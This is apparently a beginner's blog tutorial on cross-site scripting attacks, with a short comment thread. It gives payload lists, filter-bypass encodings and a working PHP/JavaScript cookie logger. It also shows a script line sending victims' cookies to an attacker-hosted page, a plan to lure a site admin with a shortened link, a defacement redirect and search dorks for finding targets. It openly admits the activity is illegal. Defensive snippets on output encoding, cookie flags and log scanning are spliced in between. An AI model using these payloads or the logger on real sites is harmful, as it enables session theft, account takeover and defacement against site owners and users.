Guide For XSS Hacking

Hello fellas,
Here is another tutorial written out by me. Enjoy learning XSS hacking with me.
I will try to make this as short as possible by covering only the basics, so that it helps noobs to understand.

So I will start like always.

What's XSS?

Here’s what wikipedia says :
Cross-site scripting (XSS) is a type of computer security vulnerability typically found in Web applications that enables attackers to inject client-side script into Web pages viewed by other users. A cross-site scripting vulnerability may be used by attackers to bypass access controls such as the same origin policy. Cross-site scripting carried out on websites accounted for roughly 80.5% of all security vulnerabilities documented by Symantec as of 2007.[1] Their effect may range from a petty nuisance to a significant security risk, depending on the sensitivity of the data handled by the vulnerable site and the nature of any security mitigation implemented by the site’s owner.

Attack!

So in this section we will be learning how to use XSS to gain control over some website. This is for a real noob who doesn't know anything about it.

So like in all other hacking, XSS also starts by finding a vulnerability. But you may need to do several things to know whether a website is really vulnerable.

So first off, remember this. A website that has something like a search box, login form or anything similar that echoes your input back into the page is often XSS vulnerable.

So for this first attack, we will be using a search box.
Put this little piece of code in the box and hit enter:

Quote:<script>alert("XSS")</script>

Now you can see it's a very simple script, hence enclosed in script tags. The script alerts a simple message, XSS. If a little box popped up saying XSS, congrats! The website is vulnerable! If nothing comes up, it means the website has filtered it out. This filter can often be bypassed. There are many types of filters, and most of the time it is the alert box that gets blocked.

So in your code, you enclosed the message "XSS" in double quotes. The filter recognises the attempt because of those double quotes (many filters strip or escape quote characters). So we have to encode our message in a form that needs no quotes, to fool the filter. Clever, huh?

So now we use a little function called String.fromCharCode. What this does is build a string from ASCII character codes, so the text never has to appear between quotes. Here is an example of how it looks:

Quote:String.fromCharCode(88,83,83)

Now 88, 83, 83 are the ASCII values for X, S, S. Check this link to learn the conversion table (not necessary though):
http://www.ascii.cl/
So now enter this newly formatted code into the search box and hit enter.

Quote:<script>alert(String.fromCharCode(88,83,83))</script>

The special thing is that you don't need to use quotes in this case, since this function builds the string for you. Now you should get the pop-up box in most cases.
Otherwise there are many other code pieces you can try. You can write your own if you know some coding.
Here are some more code pieces I found on the net that you can use for this:

Quote:"><script>alert("XSS")</script>
"><script>alert(String.fromCharCode(88,83,83))</script>
'><script>alert("XSS")</script>
'><script>alert(String.fromCharCode(88,83,83))</script>
<ScRIPt>aLeRT("XSS")</ScRIPt>
<ScRIPt<aLeRT(String.fromCharCode(88,83,83))</ScRIPt>
"><ScRIPt>aLeRT("XSS")</ScRIPt>
"><ScRIPt<aLeRT(String.fromCharCode(88,83,83))</ScRIPt>
'><ScRIPt>aLeRT("XSS")</ScRIPt>
'><ScRIPt<aLeRT(String.fromCharCode(88,83,83))</ScRIPt>
</script><script>alert("XSS")</script>
</script><script>alert(String.fromCharCode(88,83,83))</script>
"/><script>alert("XSS")</script>
"/><script>alert(String.fromCharCode(88,83,83))</script>
'/><script>alert("XSS")</script>
'/><script>alert(String.fromCharCode(88,83,83))</script>
</SCRIPT>"><SCRIPT>alert("XSS")</SCRIPT>
</SCRIPT>"><SCRIPT>alert(String.fromCharCode(88,83,83))
</SCRIPT>">"><SCRIPT>alert("XSS")</SCRIPT>
</SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
";alert("XSS");"
";alert(String.fromCharCode(88,83,83));"
';alert("XSS");'
';alert(String.fromCharCode(88,83,83));'
";alert("XSS")
";alert(String.fromCharCode(88,83,83))
';alert("XSS")
';alert(String.fromCharCode(88,83,83))

These payloads alone should be enough for you to test any type of website. Even the biggest websites might have some XSS vulnerabilities that you can find using them.
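As an added example (not code from the original post), here is the server-side fix that neutralises every payload in the list above: the echoed search term is encoded for the context it lands in, instead of a filter looking for words like "alert". The page template, the `renderSearchResult` helper and the test payloads are assumptions built for this example.

```javascript
// Added example, not from the original post: output encoding per context.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };

// Encode a value that will land in HTML text or inside a quoted attribute.
function escapeHtml(str) {
  return String(str).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Encode a value that will land inside a <script> string literal: JSON quoting
// handles the quote-breaking payloads ("; alert(...) ;"), and "<" is escaped so
// that a "</script>" inside the value can never terminate the script block.
function jsStringLiteral(str) {
  return JSON.stringify(String(str)).replace(/</g, '\\u003c');
}

// Hypothetical "you searched for ..." fragment: the same term is echoed in
// three contexts, each with the encoder that fits that context.
function renderSearchResult(term) {
  return '<p>Results for <b>' + escapeHtml(term) + '</b></p>\n' +
         '<input type="text" name="q" value="' + escapeHtml(term) + '">\n' +
         '<script>var lastSearch = ' + jsStringLiteral(term) + ';</script>';
}

// Constructed test input, copied from the payload list above.
const PAYLOADS = [
  '<script>alert("XSS")</script>',
  '"><script>alert(String.fromCharCode(88,83,83))</script>',
  "'><ScRIPt>aLeRT(String.fromCharCode(88,83,83))</ScRIPt>",
  '</script><script>alert("XSS")</script>',
  '";alert("XSS");"',
];

// True when no raw <, >, " or ' survives HTML encoding (so the payload can
// neither open a tag nor close the attribute) and the JS literal contains no
// "<" yet still round-trips to the original term.
function neutralised(term) {
  const js = jsStringLiteral(term);
  return !/[<>"']/.test(escapeHtml(term)) && !js.includes('<') && JSON.parse(js) === term;
}

function allNeutralised() {
  return PAYLOADS.every(neutralised);
}
```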

Advanced XSS

Now we will learn how to use these things to attack websites. Keep in mind that this is completely illegal and you can be caught and charged with a criminal offence for doing this. So always take precautions.

Cookie Stealing

So now we will use the cookie stealing method to do the attack. It is a small logger script that records the cookies of every user whose browser loads it. There are many ways to do that, but here is one easy method.
In this method you need to set up a website. So go to some web hosting site. I prefer http://www.000webhost.com; create an account on that website. Go to the file manager and create a new text file in it. Name it anything like cookielog.txt or something like that. Don't enter anything into it; leave it blank. Create another text file and name it something different, for example cookiellogger.txt. We will be adding some code into it so that it can send logs to the cookielog.txt file. So open the 2nd file and enter this code:

Quote:<?php

if(strlen($_SERVER['QUERY_STRING']) > 0) {
    $fp=fopen('./CookieLog.txt', 'a');
    fwrite($fp, urldecode($_SERVER['QUERY_STRING'])."\n");
    fclose($fp);
} else {
?>

var ownUrl = 'http://<?php echo $_SERVER['HTTP_HOST']; ?><?php echo $_SERVER['PHP_SELF']; ?>';

function URLEncode(str)
{
    // The Javascript escape and unescape functions do not correspond
    // with what browsers actually do...
    var SAFECHARS = "0123456789" + // Numeric
        "ABCDEFGHIJKLMNOPQRSTUVWXYZ" + // Alphabetic
        "abcdefghijklmnopqrstuvwxyz" +
        "-_.!~*'()"; // RFC2396 Mark characters
    var HEX = "0123456789ABCDEF";

    var plaintext = str;
    var encoded = "";
    for (var i = 0; i < plaintext.length; i++ ) {
        var ch = plaintext.charAt(i);
        if (ch == " ") {
            encoded += "+"; // x-www-urlencoded, rather than %20
        } else if (SAFECHARS.indexOf(ch) != -1) {
            encoded += ch;
        } else {
            var charCode = ch.charCodeAt(0);
            if (charCode > 255) {
                alert( "Unicode Character '"
                    + ch
                    + "' cannot be encoded using standard URL encoding.\n" +
                    "(URL encoding only supports 8-bit characters.)\n" +
                    "A space (+) will be substituted." );
                encoded += "+";
            } else {
                encoded += "%";
                encoded += HEX.charAt((charCode >> 4) & 0xF);
                encoded += HEX.charAt(charCode & 0xF);
            }
        }
    } // for

    return encoded;
};

cookie = URLEncode(document.cookie);
html = '<img src="'+ownUrl+'?'+cookie+'">';
document.write(html);

<?php
}
?>

So that is the cookie logger script. Now we need to send this to the admin of the target website. Most probably the admin won't look at it, so to convince him we will shorten the URL. Go to http://www.spam.com/ and shorten your URL. And since we want to trigger the vulnerability, we need to add some code too. So add this code after the URL and shrink it:

Quote:<script>document.location="http://www.host.com/mysite/CookieLogger.php?cookie=" + document.cookie;</script>

Send the link to the admin and wait for him to click it. You need to be lucky for the admin to click it. Once he has clicked it, you will get the cookie. Now you can use some tool like the Cookie Manager add-on for Mozilla Firefox and play around with it. It's a very good add-on and really helps a lot!
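Added example, not from the post: the cookie attribute that blunts the technique above is HttpOnly, which keeps a cookie out of document.cookie, so an injected logger like the one shown reads nothing. The helper below parses a Set-Cookie header and reports the missing flags; the header values, cookie name and function names are constructed for this example.

```javascript
// Added example, not from the post: audit one Set-Cookie header for the
// attributes that limit what a cookie-stealing script can do.
function parseSetCookie(header) {
  const parts = header.split(';').map((p) => p.trim()).filter(Boolean);
  const eqName = parts[0].indexOf('=');
  const name = eqName === -1 ? parts[0] : parts[0].slice(0, eqName);
  const value = eqName === -1 ? '' : parts[0].slice(eqName + 1);
  const attrs = {};
  for (const part of parts.slice(1)) {
    const eq = part.indexOf('=');
    const key = (eq === -1 ? part : part.slice(0, eq)).trim().toLowerCase();
    attrs[key] = eq === -1 ? true : part.slice(eq + 1).trim();   // flag attrs become true
  }
  return { name: name.trim(), value, attrs };
}

// Returns the list of findings for a session cookie header; empty means OK.
function auditSessionCookie(header) {
  const c = parseSetCookie(header);
  const findings = [];
  if (!c.attrs.httponly) {
    findings.push(c.name + ': missing HttpOnly, readable via document.cookie');
  }
  if (!c.attrs.secure) {
    findings.push(c.name + ': missing Secure, sent over plain HTTP');
  }
  const sameSite = typeof c.attrs.samesite === 'string' ? c.attrs.samesite.toLowerCase() : '';
  if (sameSite !== 'lax' && sameSite !== 'strict') {
    findings.push(c.name + ': SameSite not Lax or Strict');
  }
  return findings;
}

// Constructed sample headers: what a careless site sets, and the hardened form.
const WEAK = 'PHPSESSID=abc123; Path=/';
const HARDENED = 'PHPSESSID=abc123; Path=/; HttpOnly; Secure; SameSite=Lax';
```

HttpOnly stops the cookie value from leaving the browser via document.cookie; the injected script can still issue requests as the logged-in user, so it limits the damage rather than fixing the injection.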

The Deface

So now we can deface the website. That is, publishing that you have gained control over the website by making a deface page or something. Now you need a small script to redirect everyone that visits the website to the deface page:

Quote:<script>window.location="http://www.pastehtml.com/YOURDEFACEHERE/";</script>

Replace the URL with your own deface page.

Bypassing the XSS Filter

Most of the time, the simple script won't give the pop-up message: it doesn't get past the filter. So you have to use some other methods. I will discuss some of them below.

Hex Bypassing

With blocked characters like >, < and /, it is quite difficult to get an XSS payload through. Not to worry, there's always a solution: you can write your characters in hex. The hex form of a character is the same character, percent-encoded as its byte value, which the server decodes back before using it. These should help you out:

> = %3e
< = %3c
/ = %2f

ASCII Bypassing

With ASCII encoding we can avoid the character ", which is blocked quite a bit. This is one of the most common XSS filter bypasses of all time. A script that you would need to encode would look like this:

Quote:<script>alert(“XSS”)</script>

And this is the encoded form, which should work:

Quote:<script>alert(String.fromCharCode(88,83,83))</script>

To encode your little part of a script, go to this site: http://www.wocares.com/noquote.php

Case-Sensitive Bypassing

This kind of bypass rarely works, but it's always worth a shot. Some filters are set in place to detect certain strings; however, the strings the filter blocks are CASE SENSITIVE. So all we need to do is run the script with a different mix of upper- and lower-case characters. This bypass would look like this:

Quote:<ScRiPt>aLeRt("XSS")</ScRiPt>

You can also mix that with ASCII encoding if you like. This kind of bypass only works on really stupid filters, or really REALLY old ones.
And last, I am giving out some XSS dorks that you can try out on Google:

Quote:inurl:search.php?
inurl:find.php?
inurl:search.html
inurl:find.html
inurl:search.aspx
inurl:find.aspx
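Added example (not code from the post) covering the three bypasses in the section above and the String.fromCharCode trick from the first section: a filter that matches raw, case-sensitive text misses all of them, whereas percent-decoding the request (repeatedly, to cover double encoding) and lower-casing it before matching catches every one. The access-log lines, the signature list and the function names are constructed for this example.

```javascript
// Added example, not from the post: normalise a request target before
// matching, so hex (%3c), mixed case and fromCharCode forms all look alike.
function normalise(value) {
  let out = value.replace(/\+/g, ' ');
  for (let i = 0; i < 3; i++) {                 // undo double/triple encoding
    let decoded;
    try { decoded = decodeURIComponent(out); } catch (e) { break; }   // malformed %xx
    if (decoded === out) break;
    out = decoded;
  }
  return out.toLowerCase();
}

// Signatures are written in lower case only because the input is lower-cased.
const SIGNATURES = [
  { name: 'script-tag',   re: /<\s*\/?\s*script\b/ },
  { name: 'fromcharcode', re: /string\.fromcharcode\s*\(/ },
  { name: 'alert-call',   re: /\balert\s*\(/ },
];

// Returns the signature names that match the request target of one log line.
function scanLogLine(line) {
  const m = line.match(/"(?:GET|POST) (\S+)/);
  if (!m) return [];
  const target = normalise(m[1]);
  return SIGNATURES.filter((s) => s.re.test(target)).map((s) => s.name);
}

// Constructed access-log lines (not real traffic): a benign search, the plain
// payload, the mixed-case fromCharCode payload and a double-encoded payload.
const LOG_LINES = [
  '10.0.0.5 - - [01/Jan/2013:10:00:00 +0000] "GET /search.php?q=cats HTTP/1.1" 200 512',
  '10.0.0.5 - - [01/Jan/2013:10:00:01 +0000] "GET /search.php?q=%3Cscript%3Ealert(%22XSS%22)%3C/script%3E HTTP/1.1" 200 512',
  '10.0.0.5 - - [01/Jan/2013:10:00:02 +0000] "GET /search.php?q=%3CScRiPt%3EaLeRt(String.fromCharCode(88,83,83))%3C/ScRiPt%3E HTTP/1.1" 200 512',
  '10.0.0.5 - - [01/Jan/2013:10:00:03 +0000] "GET /find.php?q=%253Cscript%253Ealert(%2522XSS%2522)%253C%252Fscript%253E HTTP/1.1" 200 512',
];

// One result array per log line, in the same order.
function scanAll() {
  return LOG_LINES.map(scanLogLine);
}
```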

That's it for this tutorial.
Thanks for reading.


5 thoughts on "Guide For XSS Hacking"

  1. Link Building

    Thanks for sharing excellent information. Your web site is so cool. I'm impressed by the details that you have on this site. It reveals how nicely you perceive this subject. Bookmarked this website page, will come back for more articles. You, my friend, ROCK! I found just the information I already searched all over the place and just could not come across. What a great site.

    1. rain112 Post author

      Thanks a lot for the +ve feedback. I'm glad to hear I could teach more! Be sure to come back and share this blog with your friends and keep supporting me 🙂
